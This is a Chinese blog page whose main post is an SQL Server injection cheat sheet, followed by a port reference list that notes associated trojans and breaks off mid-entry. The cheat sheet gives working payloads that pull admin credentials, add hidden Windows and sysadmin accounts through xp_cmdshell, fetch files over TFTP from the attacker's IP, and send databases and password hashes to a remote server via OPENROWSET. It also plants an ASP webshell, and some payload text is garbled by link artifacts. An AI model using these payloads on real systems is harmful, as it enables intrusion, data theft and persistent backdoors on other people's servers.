首页
关于
友链
推荐
肥啾解析
百度一下
肥啾GPT
Search
1
宝塔面板登录 phpMyAdmin 提示服务器和客户端上指示的HTTPS之间不匹配
232 阅读
2
Customer complaints evolve with in-car tech
183 阅读
3
测试
146 阅读
4
解决Edge浏览器提示“此网站已被人举报不安全”
81 阅读
5
所谓关系
70 阅读
默认分类
网游架设
手机游戏
python
PHP
Mysql
VBA
C++
JAVA
java基础
生产管理
计划控制
ERP系统开发
APS排产
MES研究
考勤系统
CPA
财管
实务
经济法
战略
审计
税法
藏书架
古典名著
世界名著
编程秘籍
攻防渗透
经管书籍
大佬传经
风雅读物
考试相关
心情格言
拾玉良言
外文报刊
外刊随选
Facebook
Twitter
China Daily
软考
登录
Search
标签搜索
期刊读物
古文
何瑜明
累计撰写
78
篇文章
累计收到
153
条评论
首页
栏目
默认分类
网游架设
手机游戏
python
PHP
Mysql
VBA
C++
JAVA
java基础
生产管理
计划控制
ERP系统开发
APS排产
MES研究
考勤系统
CPA
财管
实务
经济法
战略
审计
税法
藏书架
古典名著
世界名著
编程秘籍
攻防渗透
经管书籍
大佬传经
风雅读物
考试相关
心情格言
拾玉良言
外文报刊
外刊随选
Facebook
Twitter
China Daily
软考
页面
关于
友链
推荐
肥啾解析
百度一下
肥啾GPT
搜索到
78
篇与
的结果
2023-02-07
SQL注入常用
1.判断有无注入点; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count() from )and 0<>(select count(*) from admin) —判断是否存在admin这张表3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(select count(*) from admin)and 1<(select count(*) from admin)4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.and 1=(select count() from admin where len()>0)–and 1=(select count(*) from admin where len(用户字段名称name)>0)and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止and 1=(select count() from admin where len()>0)and 1=(select count(*) from admin where len(name)>6) 错误and 1=(select count(*) from admin where len(name)>5) 正确 长度是6and 1=(select count(*) from admin where len(name)=6) 正确and 1=(select count(*) from admin where len(password)>11) 正确and 1=(select count(*) from admin where len(password)>12) 错误 长度是12and 1=(select count(*) from admin where len(password)=12) 正确6.猜解字符and 1=(select count(*) from admin where left(name,1)=a) —猜解用户帐号的第一位and 1=(select count(*) from admin where left(name,2)=ab)—猜解用户帐号的第二位就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) —这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的 ASSIC码就OK.最后把结果再转换成字符.group by users.id having 1=1–group by users.id, users.username, users.password, users.privs having 1=1–; insert into users values( 666, attacker, foobar, 0xffff )–UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable-UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id)-UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id,login_blank>_name)-UNION Select TOP 1 login_blank>_name FROM logintable-UNION Select TOP 1 password FROM logintable where login_blank>_name=Rahul–看_blank>服务器打的补丁=出错了打了SP4补丁and 1=(select @@VERSION)–看_blank>数据库连接账号的权限,返回正常,证明是 _blank>服务器角色sysadmin权限。and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin))–判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)and sa=(Select System_blank>_user)–and user_blank>_name()=dbo–and 0<>(select user_blank>_name()–看xp_blank>_cmdshell是否删除and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_blank>_cmdshell)–xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll–;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:inetpubwwwrootxplog70.dll–反向PING自己实验;use master;declare @s int;exec sp_blank>_oacreate “wscript.shell”,@s out;exec sp_blank>_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–加帐号;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user jiaoniang$ 1866574 /add–创建一个虚拟目录E盘:;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:inetpubwwwrootmkwebdir.vbs -w “默认Web站点” -v “e”,”e:”–访问属性:(配合写入一个webshell)declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse爆库 特殊_blank>技巧::%5c= 或者把/和 修改%5提交and 0<>(select top 1 paths from newtable)–得到库名(从1到5都是系统的id,6以上才可以判断)and 1=(select name from master.dbo.sysdatabases where dbid=7)–and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)依次提交 dbid = 7,8,9…. 得到更多的_blank>数据库名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 adminand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=adminand uid>(str(id))) 暴到UID的数值假设为18779569 uid=idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_blank>_idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in(id,…)) 来暴出其他的字段and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名依次可以得到_blank>密码。。。。。假设存在 user_blank>_id username ,password 等字段and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判断id值and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)得到WEB路径;create table [dbo].[swap] ([swappass]char);–and (select top 1 swappass from swap)=1–;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots, @value_blank>_name=/, values=@test OUTPUT insert into paths(path) values(@test)–;use ku1;–;create table cmd (str image);– 建立image类型的表cmd存在xp_blank>_cmdshell的测试过程:;exec master..xp_blank>_cmdshell dir;exec master.dbo.sp_blank>_addlogin jiaoniang$;– 加SQL帐号;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;–;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;–;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;–;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$ /add;–exec master..xp_blank>_servicecontrol start, schedule 启动_blank>服务exec master..xp_blank>_servicecontrol start, server; DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user jiaoniang$ 1866574 /add;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net localgroup administrators jiaoniang$ /add; exec master..xp_blank>_cmdshell tftp -i youip get file.exe– 利用TFTP上传文件;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目录bak.dat如果被限制则可以。select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin hax)查询构造:Select * FROM news Where id=… AND topic=… AND …..adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>select 123;–;use master;–:a or name like fff%;– 显示有一个叫ffff的用户哈。and 1<>(select count(email) from [user]);–;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;–;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;–;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;–;update [users] set email=(select top 1 count(id) from password) where name=ffff;–;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;–;update [users] set email=(select top 1 name from password where id=2) where name=ffff;–上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。通过查看ffff的用户资料可得第一个用表叫ad然后根据表名 ad得到这个表的ID 得到第二个表的名字insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)–insert into users values( 667,123,123,0xffff)–insert into users values ( 123, admin–, password, 0xffff)–;and user>0;and (select count(*) from sysobjects)>0;and (select count(*) from mysysobjects)>0 //为access_blank>数据库枚举出数据表名;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);–这是将第一个表名更新到aaa的字段处。读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);–然后id=1552 and exists(select * from aaa where aaa>5)读出第二个表,一个个的读出,直到没有为止。读字段是这样:;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));–然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));–然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名获得数据表名update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]获得数据表字段名update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),字段列如:1) [ where 条件]绕过IDS的检测[使用变量];declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:1、 开启远程_blank>数据库基本语法select from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select from table1 )参数: (1) OLEDB Provider name2、 其中连接字符串参数可以是任何端口用来连接,比如select from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select from table3.复制目标主机的整个_blank>数据库insert所有远程表到本地表。基本语法:insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select from table1) select from table2这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from table1) select from table2insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysdatabases)select * from master.dbo.sysdatabasesinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysobjects)select * from user_blank>_database.dbo.sysobjectsinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_syscolumns)select * from user_blank>_database.dbo.syscolumns复制_blank>数据库:insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from table1) select from database..table1insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from table2) select from database..table2复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中。方法如下:insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select from _blank>_sysxlogins) select from database.dbo.sysxlogins得到hash之后,就可以进行暴力破解。遍历目录的方法: 先创建一个临时表:temp;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–;insert temp exec master.dbo.xp_blank>_availablemedia;– 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:;– 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:;– 获得所有子目录的目录树结构,并寸入temp表中;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:webindex.asp;– 查看某个文件的内容;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:;–;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c: *.asp /s/a;–;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:InetpubAdminScriptsadsutil.vbs enum w3svc;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:;– (xp_blank>_dirtree适用权限PUBLIC)写入表:语句1:and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));–语句2:and 1=(Select IS_blank>_SRVROLEMEMBER(serveradmin));–语句3:and 1=(Select IS_blank>_SRVROLEMEMBER(setupadmin));–语句4:and 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));–语句5:and 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));–语句6:and 1=(Select IS_blank>_SRVROLEMEMBER(diskadmin));–语句7:and 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));–语句8:and 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));–语句9:and 1=(Select IS_blank>_MEMBER(db_blank>_owner));–把路径写到表中去:;create table dirs(paths varchar(100), id int)–;insert dirs exec master.dbo.xp_blank>_dirtree c:–and 0<>(select top 1 paths from dirs)–and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))–;create table dirs1(paths varchar(100), id int)–;insert dirs exec master.dbo.xp_blank>_dirtree e:web–and 0<>(select top 1 paths from dirs1)–把_blank>数据库备份到网页目录:下载;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:webdown.bak;–and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 参看相关表。and 1=(select user_blank>_id from USER_blank>_LOGIN)and 0=(select user from USER_blank>_LOGIN where user>1)-=- wscript.shell example -=-declare @o intexec sp_blank>_oacreate wscript.shell, @o outexec sp_blank>_oamethod @o, run, NULL, notepad.exe; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe–declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_blank>_oacreate scripting.filesystemobject, @o outexec sp_blank>_oamethod @o, opentextfile, @f out, c:boot.ini, 1exec @ret = sp_blank>_oamethod @f, readline, @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_blank>_oamethod @f, readline, @line outenddeclare @o int, @f int, @t int, @ret intexec sp_blank>_oacreate scripting.filesystemobject, @o outexec sp_blank>_oamethod @o, createtextfile, @f out, c:inetpubwwwrootfoo.asp, 1exec @ret = sp_blank>_oamethod @f, writeline, NULL,<% set o = server.createobject(“wscript.shell”): o.run( request.querystring(“cmd”) ) %>declare @o int, @ret intexec sp_blank>_oacreate speech.voicetext, @o outexec sp_blank>_oamethod @o, register, NULL, foo, barexec sp_blank>_oasetproperty @o, speed, 150exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528waitfor delay 00:00:05; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05–xp_blank>_dirtree适用权限PUBLICexec master.dbo.xp_blank>_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。create table dirs(paths varchar(100), id int)建表,这里建的表是和上面 xp_blank>_dirtree相关连,字段相等、类型相同。insert dirs exec master.dbo.xp_blank>_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
2023年02月07日
32 阅读
0 评论
0 点赞
2023-02-07
端口功能
端口大全介绍2端口:管理实用程序3端口:压缩进程5端口:远程作业登录7端口:回显9端口:丢弃11端口:在线用户13端口:时间17端口:每日引用18端口:消息发送协议19端口:字符发生器20端口:FTP文件传输协议(默认数据口)21端口:FTP文件传输协议(控制)22端口:SSH远程登录协议23端口:telnet(终端仿真协议),木马Tiny Telnet Server开放此端口24端口:预留给个人用邮件系统25端口:SMTP服务器所开放的端口,用于发送邮件27端口:NSW 用户系统 FE29端口:MSG ICP31端口:MSG验证,木马Master Paradise、HackersParadise开放此端口33端口:显示支持协议35端口:预留给个人打印机服务37端口:时间38端口:路由访问协议39端口:资源定位协议41端口:图形42端口:主机名服务43端口:who is服务44端口:MPM(消息处理模块)标志协议45端口:消息处理模块46端口:消息处理模块(默认发送口)47端口:NI FTP48端口:数码音频后台服务49端口:TACACS登录主机协议50端口:远程邮件检查协议51端口:IMP(接口信息处理机)逻辑地址维护52端口:施乐网络服务系统时间协议53端口:dns域名服务器54端口:施乐网络服务系统票据交换55端口:ISI图形语言56端口:施乐网络服务系统验证57端口:预留个人用终端访问58端口:施乐网络服务系统邮件59端口:预留个人文件服务60端口:未定义61端口:NI邮件62端口:异步通讯适配器服务63端口:whois++64端口:通讯接口65端口:TACACS数据库服务66端口:Oracle SQL*NET67端口:引导程序协议服务端68端口:引导程序协议客户端69端口:小型文件传输协议70端口:信息检索协议71端口:远程作业服务72端口:远程作业服务73端口:远程作业服务74端口:远程作业服务75端口:预留给个人拨出服务76端口:分布式外部对象存储77端口:预留给个人远程作业输入服务78端口:修正TCP79端口:查询远程主机在线用户等信息80端口:http,用于网页浏览,木马Executor开放此端口81端口:HOST2名称服务82端口:传输实用程序83端口:模块化智能终端ML设备84端口:公用追踪设备85端口:模块化智能终端ML设备86端口:Micro Focus Cobol编程语言87端口:预留给个人终端连接88端口:Kerberros安全认证系统89端口:SU/MIT telnet(终端仿真网关)90端口:DNSIX 安全属性标记图91端口:MIT Dover假脱机92端口:网络打印协议93端口:设备控制协议94端口:Tivoli对象调度96端口:DIXIE协议规范97端口:快速远程虚拟文件协议98端口:TAC新闻协议99端口:后门程序ncx99开放此端口100端口:未知用途101端口:NIC 主机名称服务102端口:消息传输代理103端口:Genesis 点对点传输网络105端口:信箱名称服务106端口:3COM-TSMUX开放端口107端口:远程Telnet服务108端口:SNA 网关访问服务109端口:POP2服务器开放此端口,用于接收邮件110端口:POP3服务器开放此端口,用于接收邮件111端口:SUN公司的RPC服务所有端口112端口:McIDAS 数据传输协议113端口:认证服务,用于鉴别TCP连接的用户114端口:音频新闻多点服务115端口:简单文件传输服务116端口:ANSA REX 通知117端口:UUCP 路径服务118端口:SQL 服务119端口:NEWS新闻组传输协议,承载USENET通信121端口:木马BO jammerkillahV开放端口122端口:SMAKY网络123端口:网络时间协议,蠕虫病毒会利用,一般关闭128端口:GSS X许可认证129端口:密码生成器协议130端口:Cisco软件开放端口131端口:Cisco软件开放端口132端口:Cisco软件开放端口133端口:统计服务134端口:INGRES-网络服务135端口:DCOM服务,冲击波病毒利用,不能关闭136端口:命名系统137端口:NETBIOS协议应用,为共享开放138端口:NETBIOS协议应用,为共享开放139端口:NETBIOS协议应用,为共享开放140端口:EMFIS数据服务141端口:EMFIS控制服务143端口:Interim邮件访问协议144端口:UMA软件开放端口145端口:UAAC协议149端口:AED 512仿真服务150端口:SQL(结构化查询语言)-网络152端口:后台文件传输协议156端口:SQL(结构化查询语言)服务158端口:PC邮件服务器159端口:NSS-路由160端口:SGMP-陷阱161端口:简单网络管理协议162端口:SNMP陷阱163端口:CMIP/TCP 管理164端口:CMIP/TCP 代理166端口:Sirius系统169端口:发送170端口:网络附言177端口:x显示管理控制协议,入侵者通过它访问X-windows操作台178端口:NextStep Window 服务179端口:边界网关协议180端口:图表181端口:统一184端口:OC服务器185端口:远程-KIS186端口:KIS 协议187端口:应用通信接口189端口:队列文件传输190端口:网关进入控制协议191端口:Prospero 目录服务192端口:OSU 网络监视系统193端口:Spider 远程控制协议194端口:多线交谈协议197端口:目录地址服务198端口:目录地址服务监视器200端口:IBM系统资源控制器201端口:AppleTalk(Mac机所用的网络协议)路由保证202端口:AppleTalk(Mac机所用的网络协议)Name Binding203端口:AppleTalk(Mac机所用的网络协议)未用端口204端口:AppleTalk(Mac机所用的网络协议)回显205端口:AppleTalk(Mac机所用的网络协议)未用端口206端口:AppleTalk(Mac机所用的网络协议)区信息207端口:AppleTalk(Mac机所用的网络协议)未用端口208端口:AppleTalk(Mac机所用的网络协议)未用端口209端口:快速邮件传输协议210端口:ANSI(美国国家标准协会)Z39.50211端口:Texas Instruments 914C/G终端213端口:IPX(以太网所用的协议)218端口:Netix消息记录协议219端口:Unisys ARPs220端口:交互邮件访问协议 v3223端口:证书分发中心224端口:masq拨号器241端口:预留端口 (224-241)245端口:链接246端口:显示系统协议257端口:安全电子交易系统258端口:Yak Winsock 个人聊天259端口:有效短程遥控260端口:开放端口261端口:IIOP 基于TLS/SSL的命名服务266端口:SCSI(小型计算机系统接口)on ST267端口:Tobit David服务层268端口:Tobit David复制281端口:个人连结282端口:Cable端口A/X286端口:FXP通信308端口:Novastor备份313端口:Magenta逻辑318端口:PKIX时间标记333端口:Texar安全端口344端口:Prospero数据存取协议345端口:Perf分析工作台346端口:Zebra服务器347端口:Fatmen服务器348端口:Cabletron管理协议358端口:Shrink可上网家电协议359端口:网络安全风险管理协议362端口:SRS发送363端口:RSVP隧道372端口:列表处理373端口:Legend公司374端口:Legend公司376端口:AmigaEnvoy网络查询协议377端口:NEC公司378端口:NEC公司379端口:TIA/EIA/IS-99调制解调器客户端380端口:TIA/EIA/IS-99调制解调器服务器381端口:hp(惠普)性能数据收集器382端口:hp(惠普)性能数据控制节点383端口:hp(惠普)性能数据警报管理384端口:远程网络服务器系统385端口:IBM应用程序386端口:ASA信息路由器定义文件.387端口:Appletalk更新路由.389端口:轻型目录访问协议395端口:网络监视控制协议396端口:Novell(美国Novell公司)Netware(Novell公司出的网络操作系统)over IP400端口:工作站解决方案401端口:持续电源402端口:Genie协议406端口:交互式邮件支持协议408端口:Prospero资源管理程序409端口:Prospero资源节点管理.410端口:DEC(数据设备公司)远程调试协议411端口:远程MT协议412端口:陷阱协定端口413端口:存储管理服务协议414端口:信息查询415端口:B网络423端口:IBM操作计划和控制开端424端口:IBM操作计划和控制追踪425端口:智能计算机辅助设计427端口:服务起位置434端口:移动ip代理435端口:移动ip管理443端口:基于TLS/SSL的网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP444端口:简单网络内存分页协议445端口:Microsoft-DS,为共享开放,震荡波病毒利用,一般应关闭446端口:DDM-远程关系数据库访问447端口:DDM-分布式文件管理448端口:DDM-使用安全访问远程数据库456端口:木马HACKERS PARADISE开放此端口458端口:apple quick time软件开放端口459端口:ampr-rcmd命令464端口:k密码服务469端口:广播控制协议470端口:scx-代理472端口:ljk-登陆481端口:Ph服务487端口:简单异步文件传输489端口:nest-协议491端口:go-登陆499端口:ISO ILL协议500端口:Internet密钥交换,Lsass开放端口,不能关闭509端口:陷阱510端口:FirstClass协议512端口:远程进程执行513端口:远程登陆514端口:cmd命令515端口:spooler516端口:可视化数据518端口:交谈519端口:unix时间520端口:扩展文件名称服务器525端口:时间服务526端口:新日期529端口:在线聊天系统服务530端口:远程过程调用531端口:聊天532端口:读新闻533端口:紧急广播端口534端口:MegaMedia管理端537端口:网络流媒体协议542端口:商业543端口:Kerberos(软件)v4/v5544端口:krcmd命令546端口:DHCPv6 客户端547端口:DHCPv6 服务器552端口:设备共享554端口:Real Time Stream控制协议555端口:木马PhAse1.0、Stealth Spy、IniKiller开放此端口556端口:远距离文件服务器563端口:基于TLS/SSL的网络新闻传输协议564端口:plan 9文件服务565端口:whoami查询566端口:streettalk567端口:banyan-rpc(远程过程调用)568端口:DPA成员资格569端口:MSN成员资格570端口:demon(调试监督程序)571端口:udemon(调试监督程序)572端口:声纳573端口:banyan-贵宾574端口:FTP软件代理系统581端口:Bundle Discovery 协议582端口:SCC安全583端口:Philips视频会议584端口:密钥服务器585端口:IMAP4+SSL (Use 993 instead)586端口:密码更改587端口:申请589端口:Eye连结595端口:CAB协议597端口:PTC名称服务598端口:SCO网络服务器管理3599端口:Aeolon Core协议600端口:Sun IPC(进程间通讯)服务器601端口:可靠系统登陆服务604端口:通道606端口:Cray统一资源管理608端口:发送人-传递/提供 文件传输器609端口:npmp-陷阱610端口:npmp-本地611端口:npmp-gui( 图形用户界面)612端口:HMMP指引613端口:HMMP操作614端口:SSL(加密套接字协议层)shell(壳)615端口:Internet配置管理616端口:SCO(Unix系统)系统管理服务器617端口:SCO桌面管理服务器619端口:Compaq(康柏公司)EVM620端口:SCO服务器管理623端口:ASF远程管理控制协议624端口:Crypto管理631端口:IPP (Internet打印协议)633端口:服务更新(Sterling软件)637端口:局域网服务器641端口:repcmd命令647端口:DHCP(动态主机配置协议)Failover648端口:注册登记协议(RRP)649端口:Cadview-3d软件协议666端口:木马Attack FTP、Satanz Backdoor开放此端口808端口:ccproxy http/gopher/ftp (over http)协议1001端口:木马Silencer,WebEx开放端口1011端口:木马Doly开放端口1024端口:动态端口的开始,木马yai开放端口1025端口:inetinfo.exe(互联网信息服务)木马netspy开放端口1026端口:inetinfo.exe(互联网信息服务)1027端口:应用层网关服务1030端口:应用层网关服务1031端口:BBN IAD1033端口:本地网络信息端口1034端口:同步通知1036端口:安全部分传输协议1070端口:木马Psyber Stream,Streaming Audio开放端口1071端口:网络服务开放端口1074端口:网络服务开放端口1080端口:Socks这一协议以通道方式穿过防火墙,允许防火墙后面的人通过一个IP地址访问INTERNET1110端口:卡巴斯基反病毒软件开放此端口1125端口:卡巴斯基反病毒软件开放此端口1203端口:许可证生效端口1204端口:登陆请求监听端口1206端口:Anthony数据端口1222端口:SNI R&D网络端口1233端口:普遍的附录服务器端口1234端口:木马SubSeven2.0、Ultors Trojan开放此端口1243端口:木马SubSeven1.0/1.9开放此端口1245端口:木马Vodoo,GabanBus,NetBus,Vodoo开放此端口1273端口:EMC-网关端口1289端口:JWalk服务器端口1290端口:WinJa服务器端口1333端口:密码策略(网络服务)(svchost.exe)1334端口:网络服务(svchost.exe)1335端口:数字公正协议1336端口:即时聊天协议(svchost.exe)1349端口:注册网络协议端口1350端口:注册网络协议端口1371端口:富士通配置协议端口1372端口:富士通配置协议端口1374端口:EPI软件系统端口1376端口:IBM个人-个人软件端口1377端口:Cichlid许可证管理端口1378端口:Elan许可证管理端口1380端口:Telesis网络许可证管理端口1381端口:苹果网络许可证管理端口1386端口:CheckSum 许可证管理端口1387端口:系统开放端口(rundll32.exe)1388端口:数据库高速缓存端口1389端口:文档管理端口1390端口:存储控制器端口1391端口:存储器存取服务器端口1392端口:打印管理端口1393端口:网络登陆服务器端口1394端口:网络登陆客户端端口1395端口:PC工作站管理软件端口1396端口:DVL活跃邮件端口1397端口:音频活跃邮件端口1398端口:视频活跃邮件端口1399端口:Cadkey许可证管理端口1433端口:Microsoft的SQL服务开放端口1434端口:Microsoft的SQL服务监视端口1492端口:木马FTP99CMP开放此端口1509端口:木马Psyber Streaming Server开放此端口1512端口:Microsoft Windows网络名称服务1524端口:许多攻击脚本安装一个后门SHELL于这个端口1600端口:木马Shivka-Burka开放此端口1645端口:远程认证拨号用户服务1701端口:第2层隧道协议1731端口:NetMeeting音频调用控制1801端口:Microsoft消息队列服务器1807端口:木马SpySender开放此端口1900端口:可被利用ddos攻击,一般关闭1912端口:金山词霸开放此端口1981端口:木马ShockRave开放此端口1999端口:木马BackDoor,yai开放此端口2000端口:木马GirlFriend 1.3、Millenium 1.0开放此端口2001端口:木马Millenium 1.0、Trojan Cow,黑洞2001开放此端口2003端口:GNU 查询2023端口:木马Pass Ripper开放此端口2049端口:NFS程序常运行于此端口2115端口:木马Bugs开放此端口2140端口:木马Deep Throat 1.0/3.0,The Invasor开放此端口2500端口:应用固定端口会话复制的RPC客户2504端口:网络平衡负荷2565端口:木马Striker开放此端口2583端口:木马Wincrash 2.0开放此端口2801端口:木马Phineas Phucker开放此端口2847端口:诺顿反病毒服务开放此端口3024端口:木马WinCrash开放此端口3128端口:squid http代理服务器开放此端口3129端口:木马Master Paradise开放此端口3150端口:木马The Invasor,deep throat开放此端口3210端口:木马SchoolBus开放此端口3306端口:MySQL开放此端口3333端口:木马Prosiak开放此端口3389端口:WINDOWS 